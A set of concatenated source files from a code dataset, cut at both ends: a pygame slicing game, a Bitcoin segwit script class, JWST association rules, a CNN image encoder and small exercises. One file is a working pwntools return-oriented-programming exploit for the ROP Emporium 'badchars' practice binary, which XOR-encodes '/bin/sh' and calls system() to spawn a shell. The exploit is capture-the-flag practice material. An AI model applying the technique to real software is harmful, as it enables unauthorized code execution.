pygame.draw.rect(DISPLAYSURF, BLACK, (0, 0, gameScreenRect.left, windowHeight))\n pygame.draw.rect(DISPLAYSURF, BLACK, (0, 0, windowWidth, gameScreenRect.top))\n pygame.draw.rect(DISPLAYSURF, BLACK, (right, 0, gameScreenRect.left, windowHeight))\n pygame.draw.rect(DISPLAYSURF, BLACK, (0, bottom, windowWidth, gameScreenRect.top))\n\ndef removeRoots():\n global livesLeft, rootGroup\n for root in rootGroup:\n if root.checkShouldRemoveRoot() == True:\n if root.hasBeenSliced == False and root.isBomb == False:\n livesLeft -= 1\n root.kill()\n\ndef moveAllRoots():\n global rootGroup\n for root in rootGroup:\n root.moveFruit()\n\ndef reconfigAllRootsPosAndSize(oldGameScreenRect):\n global resizeFactor, rootGroup\n\n rooty = addNewRanRoot()\n rootGroup.add(rooty)\n\n for i, root in enumerate(rootGroup):\n root.resizeImg(oldGameScreenRect, False)\n root.curPosAddX, root.curPosAddY = reconfigFruitPos(root.curPosAddX, root.curPosAddY, oldGameScreenRect)\n root.curPosX, 
root.curPosY = gameScreenRect.left + root.curPosAddX, gameScreenRect.top + root.curPosAddY\n root.startXPos, root.startYPos = reconfigFruitPos(root.startXPos, root.startYPos, oldGameScreenRect)\n #root.setImgPos()\n root.vertexPosAddX, root.vertexPosAddY = reconfigFruitPos(root.vertexPosAddX, root.vertexPosAddY, oldGameScreenRect)\n root.vertexXPos, root.vertexYPos = gameScreenRect.left + root.vertexPosAddX, gameScreenRect.top + root.vertexPosAddY\n root.setImgPos()\n\n rooty.kill()\n\n\ndef addNewRanRoot():\n images = None\n randy = randint(0, 9)\n isBomb = False\n if randy == 0:\n img1 = pygame.image.load('ClassicPotato-1.png')\n img2 = pygame.image.load('ClassicPotato-2.png')\n img3 = pygame.image.load('ClassicPotato-3.png')\n img4 = pygame.image.load('ClassicPotato-4.png')\n img5 = pygame.image.load('ClassicPotato-7.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 1:\n img1 = pygame.image.load('Carrot-1.png.png')\n img2 = pygame.image.load('Carrot-2.png.png')\n img3 = pygame.image.load('Carrot-3.png.png')\n img4 = pygame.image.load('Carrot-4.png.png')\n img5 = pygame.image.load('Carrot-7.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 2:\n img1 = pygame.image.load('Garlic-1.png.png')\n img2 = pygame.image.load('Garlic-2.png.png')\n img3 = pygame.image.load('Garlic-3.png.png')\n img4 = pygame.image.load('Garlic-4.png.png')\n img5 = pygame.image.load('Garlic-6.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 3:\n img1 = pygame.image.load('PurpleVitelottePotato-1.png.png')\n img2 = pygame.image.load('PurpleVitelottePotato-2.png.png')\n img3 = pygame.image.load('PurpleVitelottePotato-3.png.png')\n img4 = pygame.image.load('PurpleVitelottePotato-4.png.png')\n img5 = pygame.image.load('PurpleVitelottePotato-6.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 4:\n img1 = pygame.image.load('Radish-1.png.png')\n img2 = pygame.image.load('Radish-2.png.png')\n img3 = pygame.image.load('Radish-3.png.png')\n img4 = pygame.image.load('Radish-4.png.png')\n img5 = pygame.image.load('Radish-8.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 5:\n img1 = pygame.image.load('RedLauraPotato-1.png.png')\n img2 = pygame.image.load('RedLauraPotato-2.png.png')\n img3 = pygame.image.load('RedLauraPotato-3.png.png')\n img4 = pygame.image.load('RedLauraPotato-4.png.png')\n img5 = pygame.image.load('RedLauraPotato-7.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 6:\n img1 = pygame.image.load('SweetPotato-1.png.png')\n img2 = pygame.image.load('SweetPotato-2.png.png')\n img3 = pygame.image.load('SweetPotato-3.png.png')\n img4 = pygame.image.load('SweetPotato-4.png.png')\n img5 = pygame.image.load('SweetPotato-5.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 7:\n img1 = pygame.image.load('Turnip-1.png.png')\n img2 = pygame.image.load('Turnip-2.png.png')\n img3 = pygame.image.load('Turnip-3.png.png')\n img4 = pygame.image.load('Turnip-4.png.png')\n img5 = pygame.image.load('Turnip-10.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 8:\n img1 = pygame.image.load('YukonGoldPotato-1.png.png')\n img2 = pygame.image.load('YukonGoldPotato-2.png.png')\n img3 = pygame.image.load('YukonGoldPotato-3.png.png')\n img4 = pygame.image.load('YukonGoldPotato-4.png.png')\n img5 = pygame.image.load('YukonGoldPotato-7.png.png')\n images = [img1, img2, img3, img4, img5]\n if randy == 9:\n img1 = pygame.transform.smoothscale(pygame.image.load('Bomb-1.png.png'), (128, 128))\n img2 = 
pygame.transform.smoothscale(pygame.image.load('Bomb-2.png.png'), (128, 128))\n img3 = pygame.transform.smoothscale(pygame.image.load('Bomb-3.png.png'), (128, 128))\n img4 = pygame.transform.smoothscale(pygame.image.load('Bomb-4.png.png'), (128, 128))\n img5 = pygame.transform.smoothscale(pygame.image.load('Bomb-6.png.png'), (128, 128))\n images = [img1, img2, img3, img4, img5]\n isBomb = True\n\n img, (startX, startY), (vertexX, vertexY) = getRanStartAndVertexPos()\n left, top = gameScreenRect.topleft\n return Fruit(images, (startX, startY), (vertexX, vertexY), isBomb)\n\ndef reconfigFruitPos(posX, posY, oldGameScreenRect): # scales the positions of coordinates appropriately when screen size changes\n global gameScreenRect, resizeGameScreenRect\n\n factorLengthX = gameScreenRect.w/oldGameScreenRect.w\n factorLengthY = gameScreenRect.h/oldGameScreenRect.h\n #print(factorLengthY)\n #print(factorLengthX)\n resizeGameScreenRect = oldGameScreenRect\n newPosX, newPosY = factorLengthX*posX, factorLengthY*posY\n return newPosX, newPosY\n\ndef getRanStartAndVertexPos():\n global gameScreenRect\n\n left, top = gameScreenRect.topleft\n left, bottom = gameScreenRect.bottomleft\n w, h = gameScreenRect.w, gameScreenRect.h\n ranStartXAdd, ranStartYAdd = randint(35, w-35), h - 35\n ranVertexXAdd, ranVertexYAdd = randint(30, h-30), randint(30, h - 60)\n img = pygame.image.load('ClassicPotato-1.png')\n return img, (ranStartXAdd, ranStartYAdd), (ranVertexXAdd, ranVertexYAdd)\n\ndef redrawScreen():\n DISPLAYSURF.fill(BLACK)\n drawScreenArea(True)\n\ndef getFactorLength():\n factorLength = windowWidth\n\n if windowWidth >= windowHeight:\n factorLength = windowHeight\n else:\n factorLength = windowWidth\n return factorLength\n\ndef drawCursorTrail(): # if the cursor speed is greater than minSpeed, then a trail will for behind it until it's greater than a certain amount\n global cursorSpeed\n particles = []\n particles.append()\n\n\ndef getCursorSpeedIsFast(initialMousePos, curMousePos): # every 200 milliseconds, the mouse should have moved past at least 100 pixels\n\n xInitial, yInitial = initialMousePos\n xCur, yCur = curMousePos\n xDif = abs(xCur - xInitial)\n yDif = abs(yCur - yInitial)\n distance = math.sqrt(xDif*xDif + yDif*yDif)\n cursorSpeed = distance, 200 # cursor speed is distance/200 millaseconds\n if distance > 185:\n return True\n else:\n return False\n\ndef drawScreenArea(booDraw):\n global gameScreenRect\n\n gameScreenRect = None\n factorLength = getFactorLength()\n img = pygame.image.load('choppingBoard.png')\n\n remainder = int(factorLength * 80 / 81) % 15\n length = int(factorLength * 80 / 81) - remainder\n img = pygame.transform.smoothscale(img, (length, length))\n img.get_rect().center = (int(windowWidth / 2), int(windowHeight / 2))\n gameScreenRect = img.get_rect()\n gameScreenRect.center = (int(windowWidth / 2), int(windowHeight / 2))\n left, top = gameScreenRect.topleft\n if booDraw == True:\n DISPLAYSURF.blit(img, (left, top))\n\ndef determineMode(position):\n global DISPLAYSURF\n xPos, yPos = position\n if openScreenRects[0].collidepoint(xPos, yPos):\n DISPLAYSURF.fill(BLACK)\n return True\n else:\n return False\n\ndef openingScreen(bool):\n global DISPLAYSURF, openingFONT, windowWidth, windowHeight, openScreenRects, factor, rootGroup\n openScreenRects.clear();\n color1 = GREY\n color2 = BLACK\n factorW = windowWidth / 500\n factorH = windowHeight / 500\n factor = factorW\n if factorH <= factorW:\n factor = factorH\n if bool == True:\n color1 = BLACK\n color2 = GREY\n\n openingFONT = 
pygame.font.SysFont('chiller', int(factor * 110))\n DISPLAYSURF.fill(BLACK)\n textSurface = openingFONT.render('Root Ninja:', True, color1, color2)\n textRect = textSurface.get_rect()\n textRect.center = (int(windowWidth / 2), int(windowHeight / 2))\n openScreenRects.append((textRect))\n DISPLAYSURF.blit(textSurface, textRect)\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\ndef resetVariables():\n global isFast, openScreenRects, gameStarted, gameScreenRect, resizeGameScreenRect, oldFactorLength, rootGroup,\\\n livesLeft, score\n\n #isFast = False\n #openScreenRects = [] # stores rectangles of the opening screen\n gameStarted = False # when is gameStarted is False, start screen appears\n #gameScreenRect = None\n #resizeGameScreenRect = None\n #oldFactorLength = 1\n #rootGroup = pygame.sprite.Group()\n rootGroup.empty()\n score = 0\n livesLeft = 3\n\n\ndef main():\n global DISPLAYSURF, windowWidth, windowHeight, gameStarted, isFast, score, livesLeft, rootGroup\n my_eventTime = USEREVENT + 1\n pygame.time.set_timer(my_eventTime, 200)\n changeEventTime = True\n openingScreen(True)\n titleBool = True\n initMousePosX, initMousePosY = pygame.mouse.get_pos()\n pygame.mouse.set_cursor(*pygame.cursors.broken_x)\n drawScreenArea(False)\n oldGameScreenRect = None\n\n collideLine = None\n\n fruitSpawnTimer = 2000 # when fruitSpawnTimer time has elapsed, a new fruit should spawn\n startTics = pygame.time.get_ticks()\n\n while True:\n\n for event in pygame.event.get():\n\n if livesLeft <= 0 and gameStarted == True:\n drawXLives()\n pygame.display.update()\n pygame.time.wait(2000)\n resetVariables()\n changeEventTime = True\n gameStarted = False\n pygame.time.set_timer(my_eventTime, 0)\n pygame.time.set_timer(my_eventTime, 200)\n fruitSpawnTimer = 2000\n\n if gameStarted == True and changeEventTime == True:\n changeEventTime = False\n pygame.time.set_timer(my_eventTime, 0)\n pygame.time.set_timer(my_eventTime, 150)\n initMousePosX, initMousePosY = pygame.mouse.get_pos()\n\n if gameStarted == True and event.type == my_eventTime:\n redrawScreen()\n oldGameScreenRect = gameScreenRect\n drawScore()\n drawXLives()\n checkComboPoints()\n removeRoots()\n moveAllRoots()\n rootGroup.draw(DISPLAYSURF) # draws the roots\n rootGroup.update()\n drawBlackOutsideOfGSR()\n\n\n if gameStarted == True and pygame.time.get_ticks() - startTics >= fruitSpawnTimer:\n startTics = pygame.time.get_ticks()\n fruitSpawnTimer = randint(80, 2000)\n rootGroup.add(addNewRanRoot())\n\n if gameStarted == False and event.type == pygame.MOUSEBUTTONDOWN:\n gameStarted = determineMode(pygame.mouse.get_pos())\n startTics = pygame.time.get_ticks()\n\n if event.type == my_eventTime and gameStarted == False:\n titleBool = not titleBool\n openingScreen(titleBool)\n\n if event.type == QUIT:\n terminate()\n\n if event.type == pygame.VIDEORESIZE: # Allows resizing screen\n DISPLAYSURF = pygame.display.set_mode((event.w, event.h), pygame.RESIZABLE)\n windowWidth, windowHeight, = event.w, event.h\n\n if gameStarted == True:\n redrawScreen()\n reconfigAllRootsPosAndSize(oldGameScreenRect)\n oldGameScreenRect = gameScreenRect\n\n if event.type == my_eventTime and pygame.mouse.get_pressed()[0]:\n pygame.draw.aaline(DISPLAYSURF, RED, (initMousePosX, initMousePosY), (pygame.mouse.get_pos()), 6)\n curPos = pygame.mouse.get_pos()\n\n isFast = getCursorSpeedIsFast((initMousePosX, initMousePosY), curPos)\n if isFast == True:\n checkMouseRootCollide(initMousePosX, initMousePosY, curPos)\n\n initMousePosX, initMousePosY = pygame.mouse.get_pos()\n 
#print(str(isFast))\n\n            if event.type == my_eventTime:\n                initMousePosX, initMousePosY = pygame.mouse.get_pos()\n\n\n        pygame.display.update()\n        FPSCLOCK.tick(FPS)\n\n\n# RUN MAIN\nif __name__ == '__main__':\n    main()\n\n\n\n\n\n\n\n","sub_path":"RootNinjaGame/backuppe.py","file_name":"backuppe.py","file_ext":"py","file_size_in_byte":22709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"435607474","text":"from aiobitcoin.tools.intbytes import byte2int\n\nfrom ..script import tools\n\nfrom ...serialize import b2h\n\nfrom .ScriptType import ScriptType\n\nfrom aiobitcoin.tools.contrib import segwit_addr\n\n\nclass ScriptPayToScriptWit(ScriptType):\n    def __init__(self, version, hash256):\n        assert len(version) == 1\n        assert isinstance(version, bytes)\n        assert len(hash256) == 32\n        assert isinstance(hash256, bytes)\n        version_int = byte2int(version)\n        assert 0 <= version_int <= 16\n\n        self.version = version_int\n        self.hash256 = hash256\n        self._address = None\n        self._script = None\n\n    @classmethod\n    def from_script(cls, script):\n        if len(script) != 34 or script[0:2] != b'\\00\\x20':\n            raise ValueError(\"bad script\")\n\n        return cls(script[:1], script[2:])\n\n    def solve(self, **kwargs):\n        \"\"\"\n        p2sh_lookup:\n            dict-like structure that returns the underlying script for the given hash256\n        \"\"\"\n        from . import script_obj_from_script\n        p2sh_lookup = kwargs.get(\"p2sh_lookup\")\n\n        if p2sh_lookup is None:\n            raise ValueError(\"p2sh_lookup (with hash256) not set\")\n\n        underlying_script = p2sh_lookup.get(self.hash256)\n        if underlying_script is None:\n            raise ValueError(\"underlying script cannot be determined for %s\" % b2h(self.hash256))\n\n        script_obj = script_obj_from_script(underlying_script)\n\n        kwargs[\"signature_for_hash_type_f\"] = kwargs[\"signature_for_hash_type_f\"].witness\n        kwargs[\"script_to_hash\"] = underlying_script\n        kwargs[\"existing_script\"] = tools.bin_script(kwargs[\"existing_witness\"])\n        underlying_solution = script_obj.solve(**kwargs)\n        # we need to unwrap the solution\n        solution = []\n        pc = 0\n\n        while pc < len(underlying_solution):\n            opcode, data, pc = tools.get_opcode(underlying_solution, pc)\n            solution.append(data)\n\n        solution.append(underlying_script)\n        return (b\"\", solution)\n\n    def script(self):\n        if self._script is None:\n            # create the script\n            STANDARD_SCRIPT_OUT = \"OP_0 %s\"\n            script_text = STANDARD_SCRIPT_OUT % b2h(self.hash256)\n            self._script = tools.compile(script_text)\n\n        return self._script\n\n    def info(self, netcode=None):\n        def address_f(netcode=netcode):\n            from aiobitcoin.tools.networks import bech32_hrp_for_netcode\n            from aiobitcoin.tools.networks.default import get_current_netcode\n\n            if netcode is None:\n                netcode = get_current_netcode()\n\n            bech32_hrp = bech32_hrp_for_netcode(netcode)\n            address = segwit_addr.encode(bech32_hrp, self.version, self.hash256)\n            return address\n\n        return dict(type=\"pay to witness script hash\", address=\"DEPRECATED call address_f instead\",\n                    address_f=address_f, hash256=self.hash256, script=self._script)\n\n    def __repr__(self):\n        return \"<ScriptPayToScriptWit %s>\" % self.address()\n","sub_path":"aiobitcoin/tools/tx/pay_to/ScriptPayToScriptWit.py","file_name":"ScriptPayToScriptWit.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"42206161","text":"# -*- coding: utf-8 -*-\nx=int(input('digite o valor:'))\nsoma=0\nfor i in range(1,x,1):\n    if x%i==0:\n        print(i)\n        soma=soma+i\nif soma==x:\n    
print('perfeito')\nelse:\n print('não perfeito')","sub_path":"moodledata/vpl_data/129/usersdata/235/33677/submittedfiles/al7.py","file_name":"al7.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"422103008","text":"from pwn import *\n\n#0x0000000000400b30 : xor byte ptr [r15], r14b ; ret\n#0x0000000000400b40 : pop r14 ; pop r15 ; ret\n#0x0000000000400b39 : pop rdi ; ret\n#0x0000000000400b34 : mov qword ptr [r13], r12 ; ret\n#0x0000000000400b3b : pop r12 ; pop r13 ; ret\n\nbad_chars=['b', 'i', 'c', '/' ,' ','f','n','s']\n\nCALL_SYSTEM=0x004006f0\nSTR_ADDR=0x00601100\nSET_RDI=0x00400b39\nSET_XOR_REGS = 0x00400b40\nXOR_BYTES=0x00400b30\nSET_REGS=0x00400b3b\nWRITE_MEM=0x00400b34\n\nxor_key=0x12\n\ndef write_str(s,addr,exp):\n #write 8 byte string with bad chars\n exp+=p64(SET_REGS)\n s=list(s)\n xored_s=[chr(ord(ch)^xor_key) if ch in bad_chars else ch for ch in s]\n exp+=\"\".join(xored_s)\n exp+=p64(addr)\n exp+=p64(WRITE_MEM)\n for ch in s:\n if ch in bad_chars:\n exp+=p64(SET_XOR_REGS)\n exp+=chr(xor_key)+\"\\x00\"*7\n exp+=p64(addr)\n exp+=p64(XOR_BYTES)\n addr+=1\n\n return exp\n\nr=process(\"./badchars\")\nexploit=b'A'*40\nexploit=write_str(\"/bin/sh\\x00\",STR_ADDR,exploit)\nexploit+=p64(SET_RDI)\nexploit+=p64(STR_ADDR)\nexploit+=p64(CALL_SYSTEM)\nr.sendline(exploit)\nr.interactive()\n","sub_path":"ROP Emporium[badchars-64bit]/pwn_badchars.py","file_name":"pwn_badchars.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"307220062","text":"\"\"\"Association Definitions: DMS Level3 product associations\n\"\"\"\nimport logging\n\nfrom jwst.associations.lib.rules_level3_base import *\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n# --------------------------------\n# Start of the User-level rules\n# --------------------------------\n\n\n# ----------------------------------\n# Image associations\nclass Asn_Image(\n AsnMixin_Image,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"Non-Association Candidate Dither Associations\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'pointing_type': {\n 'value': 'SCIENCE',\n 'inputs': ['PNTGTYPE']\n },\n 'wfsvisit': {\n 'value': 'NULL',\n 'inputs': ['WFSVISIT'],\n },\n })\n\n # Now check and continue initialization.\n super(Asn_Image, self).__init__(*args, **kwargs)\n\n def _init_hook(self, member):\n \"\"\"Post-check and pre-add initialization\"\"\"\n\n self.data['asn_type'] = 'image'\n super(Asn_Image, self)._init_hook(member)\n\n\nclass Asn_WFSCMB(\n AsnMixin_Image,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"Wavefront Sensing association\n\n Notes\n -----\n Defined by `TRAC issue #269 `_\n \"\"\"\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'wfsvisit': {\n 'value': '(?!NULL).+',\n 'inputs': ['WFSVISIT'],\n },\n 'asn_candidate_wfs': {\n 'value': '.+MOSAIC.+',\n 'inputs': ['ASN_CANDIDATE'],\n 'force_unique': True,\n 'is_acid': True,\n },\n 'activity_id': {\n 'value': None,\n 'inputs': ['ACT_ID']\n }\n })\n\n # Now check and continue initialization.\n super(Asn_WFSCMB, self).__init__(*args, **kwargs)\n\n def _init_hook(self, member):\n \"\"\"Post-check and pre-add initialization\"\"\"\n\n self.data['asn_type'] = 'wfs'\n super(Asn_WFSCMB, self)._init_hook(member)\n\n\n# Spectrographic 
Associations\nclass Asn_MIRI_LRS_FIXEDSLIT(\n AsnMixin_Spectrum,\n AsnMixin_MIRI,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"MIRI LRS Fixed slit\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'patttype': {\n 'value': None,\n 'inputs': ['PATTTYPE'],\n 'force_unique': True\n },\n 'exp_type': {\n 'value': 'MIR_LRS-FIXEDSLIT',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': 'P750L',\n 'inputs': ['FILTER']\n },\n 'subarray': {\n 'value': 'FULL',\n 'inputs': ['SUBARRAY']\n }\n })\n\n # Check and continue initialization.\n super(Asn_MIRI_LRS_FIXEDSLIT, self).__init__(*args, **kwargs)\n\n\nclass Asn_MIRI_LRS_SLITLESS(\n AsnMixin_Spectrum,\n AsnMixin_MIRI,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"MIRI LRS Slitless\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'exp_type': {\n 'value': 'MIR_LRS-SLITLESS',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': 'P750L',\n 'inputs': ['FILTER']\n },\n 'subarray': {\n 'value': 'SUBPRISM',\n 'inputs': ['SUBARRAY']\n }\n })\n\n # Check and continue initialization.\n super(Asn_MIRI_LRS_SLITLESS, self).__init__(*args, **kwargs)\n\n\nclass Asn_NIR_SO_SLITLESS(\n AsnMixin_Spectrum,\n AsnMixin_NIRISS,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"NIRISS Single-Object Slitless\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'detector': {\n 'value': 'NIS',\n 'inputs': ['DETECTOR']\n },\n 'exp_type': {\n 'value': 'NIS_SOSS',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': 'GR700XD',\n 'inputs': ['PUPIL']\n },\n 'subarray': {\n 'value': 'FULL|SUBSTRIP256|SUBSTRIP80',\n 'inputs': ['SUBARRAY'],\n 'force_unique': True\n }\n })\n\n # Check and continue initialization.\n super(Asn_NIR_SO_SLITLESS, self).__init__(*args, **kwargs)\n\n\nclass Asn_NRS_FIXEDSLIT(\n AsnMixin_Spectrum,\n AsnMixin_NIRSPEC,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"NIRSPEC Fixed Slit\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'exp_type': {\n 'value': 'NRS_FIXEDSLIT',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': None,\n 'inputs': ['FILTER']\n },\n 'opt_elem2': {\n 'value': None,\n 'inputs': ['GRATING']\n },\n 'fixed_slit': {\n 'value': None,\n 'inputs': ['FXD_SLIT']\n },\n 'subarray': {\n 'value': None,\n 'inputs': ['SUBARRAY']\n },\n })\n\n # Check and continue initialization.\n super(Asn_NRS_FIXEDSLIT, self).__init__(*args, **kwargs)\n\n\nclass Asn_NRS_MSA(\n AsnMixin_Spectrum,\n AsnMixin_NIRSPEC,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"NIRSPEC MSA\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'pointing_type': {\n 'value': 'SCIENCE',\n 'inputs': ['PNTGTYPE']\n },\n 'exp_type': {\n 'value': 'NRS_MSASPEC',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': None,\n 'inputs': ['FILTER']\n },\n 'opt_elem2': {\n 'value': None,\n 'inputs': ['GRATING']\n },\n })\n\n # Check and continue initialization.\n super(Asn_NRS_MSA, self).__init__(*args, **kwargs)\n\n\nclass Asn_MIRI_MRS(\n AsnMixin_Spectrum,\n AsnMixin_MIRI,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"MIRI MRS (IFU)\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'exp_type': {\n 'value': 'MIR_MRS',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': None,\n 'inputs': ['BAND']\n },\n })\n\n # Check and 
continue initialization.\n        super(Asn_MIRI_MRS, self).__init__(*args, **kwargs)\n\n\nclass Asn_NRS_IFU(\n    AsnMixin_Spectrum,\n    AsnMixin_NIRSPEC,\n    AsnMixin_Target,\n    AsnMixin_Unique_Config\n):\n    \"\"\"NIRSPEC IFU\"\"\"\n\n    def __init__(self, *args, **kwargs):\n\n        # Setup for checking.\n        self.add_constraints({\n            'exp_type': {\n                'value': 'NRS_IFU',\n                'inputs': ['EXP_TYPE']\n            },\n            'opt_elem': {\n                'value': None,\n                'inputs': ['GRATING']\n            }\n        })\n\n        # Check and continue initialization.\n        super(Asn_NRS_IFU, self).__init__(*args, **kwargs)\n\n    def _init_hook(self, member):\n        \"\"\"Post-check and pre-add initialization\"\"\"\n\n        self.data['asn_type'] = 'nrsifu'\n        super(AsnMixin_Spectrum, self)._init_hook(member)\n","sub_path":"jwst/associations/lib/rules_level3.py","file_name":"rules_level3.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"537489091","text":"#20\nori = input().split(\",\")\ndic = {}\nminNum = 0\nfor item in ori:\n    if item not in dic:\n        dic[item] = 1\n    else:\n        dic[item] += 1\nfor item in dic:\n    ordinary = int(item) + 1\n    \n    minNum += ordinary\nprint(minNum)","sub_path":"Code/CodeRecords/2238/60771/270765.py","file_name":"270765.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"292586892","text":"\"\"\"CNN for image processing.\"\"\"\n\nfrom typing import List, Tuple, Type, Optional\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.contrib.layers import conv2d, max_pool2d, batch_norm\n\nfrom neuralmonkey.checking import assert_shape\nfrom neuralmonkey.dataset import Dataset\nfrom neuralmonkey.encoders.attentive import Attentive\nfrom neuralmonkey.decoding_function import Attention\nfrom neuralmonkey.model.model_part import ModelPart, FeedDict\nfrom neuralmonkey.nn.projection import multilayer_projection\nfrom neuralmonkey.nn.utils import dropout\n\n\nclass CNNEncoder(ModelPart, Attentive):\n    \"\"\"An image encoder.\n\n    It projects the input image through a series of convolutional operations. The\n    projected image is vertically cut and fed to stacked RNN layers which\n    encode the image into a single vector.\n\n    Attributes:\n        input_op: Placeholder for the batch of input images\n        padding_masks: Placeholder for matrices telling where the\n            image has been padded.\n        image_processing_layers: List of TensorFlow operators that are\n            visualizable image transformations.\n        encoded: Operator that returns a batch of encoded images (intended\n            as an input for the decoder).\n        attention_tensor: Tensor computing a batch of attention\n            matrices for the decoder.\n        train_mode: Placeholder for boolean telling whether the training\n            is running.\n    \"\"\"\n\n    # pylint: disable=too-many-arguments, too-many-locals\n    def __init__(self,\n                 name: str,\n                 data_id: str,\n                 convolutions: List[Tuple[int, int, Optional[int]]],\n                 image_height: int, image_width: int, pixel_dim: int,\n                 fully_connected: Optional[List[int]] = None,\n                 batch_normalization: bool = True,\n                 local_response_normalization: bool = True,\n                 dropout_keep_prob: float = 0.5,\n                 attention_type: Type = Attention,\n                 save_checkpoint: Optional[str] = None,\n                 load_checkpoint: Optional[str] = None) -> None:\n        \"\"\"Initialize a convolutional network for image processing.\n\n        Args:\n            convolutions: Configuration of convolutional layers. 
It is a list\n of triplets of integers where the values are: size of the\n convolutional window, number of convolutional filters, and size\n of max-pooling window. If the max-pooling size is set to None,\n no pooling is performed.\n data_id: Identifier of the data series in the dataset.\n image_height: Height of the input image in pixels.\n image_width: Width of the image.\n pixel_dim: Number of color channels in the input images.\n batch_normalization: Flag whether the batch normalization\n should be used between the convolutional layers.\n local_response_normalization: Flag whether to use local\n response normalization between the convolutional layers.\n dropout_keep_prob: Probability of keeping neurons active in\n dropout. Dropout is done between all convolutional layers and\n fully connected layer.\n \"\"\"\n ModelPart.__init__(self, name, save_checkpoint, load_checkpoint)\n Attentive.__init__(self, attention_type)\n\n self.data_id = data_id\n self.dropout_keep_prob = dropout_keep_prob\n\n with self.use_scope():\n self.train_mode = tf.placeholder(tf.bool, shape=[],\n name=\"train_mode\")\n self.input_op = tf.placeholder(\n tf.float32,\n shape=(None, image_height, image_width, pixel_dim),\n name=\"input_images\")\n\n self.padding_masks = tf.placeholder(\n tf.float32,\n shape=(None, image_height, image_width, 1),\n name=\"padding_masks\")\n\n last_layer = self.input_op\n last_padding_masks = self.padding_masks\n\n self.image_processing_layers = [] # type: List[tf.Tensor]\n\n with tf.variable_scope(\"convolutions\"):\n for i, (filter_size,\n n_filters,\n pool_size) in enumerate(convolutions):\n with tf.variable_scope(\"cnn_layer_{}\".format(i)):\n last_layer = conv2d(last_layer, n_filters, filter_size)\n self.image_processing_layers.append(last_layer)\n\n if pool_size:\n last_layer = max_pool2d(last_layer, pool_size)\n self.image_processing_layers.append(last_layer)\n last_padding_masks = max_pool2d(\n last_padding_masks, pool_size)\n\n if local_response_normalization:\n last_layer = tf.nn.local_response_normalization(\n last_layer)\n\n if batch_normalization:\n last_layer = batch_norm(\n last_layer, is_training=self.train_mode)\n\n last_layer = dropout(last_layer, dropout_keep_prob,\n self.train_mode)\n\n # last_layer shape is batch X height X width X channels\n last_layer = last_layer * last_padding_masks\n\n # pylint: disable=no-member\n last_height, last_width, last_n_channels = [\n s.value for s in last_layer.get_shape()[1:]]\n # pylint: enable=no-member\n\n if fully_connected is None:\n # we average out by the image size -> shape is number\n # channels from the last convolution\n self.encoded = tf.reduce_mean(last_layer, [1, 2])\n assert_shape(self.encoded, [None, convolutions[-1][1]])\n else:\n last_layer_flat = tf.reshape(\n last_layer,\n [-1, last_width * last_height * last_n_channels])\n self.encoded = multilayer_projection(\n last_layer_flat, fully_connected,\n activation=tf.nn.relu,\n dropout_keep_prob=self.dropout_keep_prob,\n train_mode=self.train_mode)\n\n self.__attention_tensor = tf.reshape(\n last_layer, [-1, last_width * last_height, last_n_channels])\n\n self.__attention_mask = tf.reshape(\n last_padding_masks, [-1, last_width * last_height])\n\n @property\n def _attention_tensor(self) -> tf.Tensor:\n return self.__attention_tensor\n\n @property\n def _attention_mask(self) -> tf.Tensor:\n return self.__attention_mask\n\n def feed_dict(self, dataset: Dataset, train: bool = False) -> FeedDict:\n # if it is from the pickled file, it is list, not numpy tensor,\n 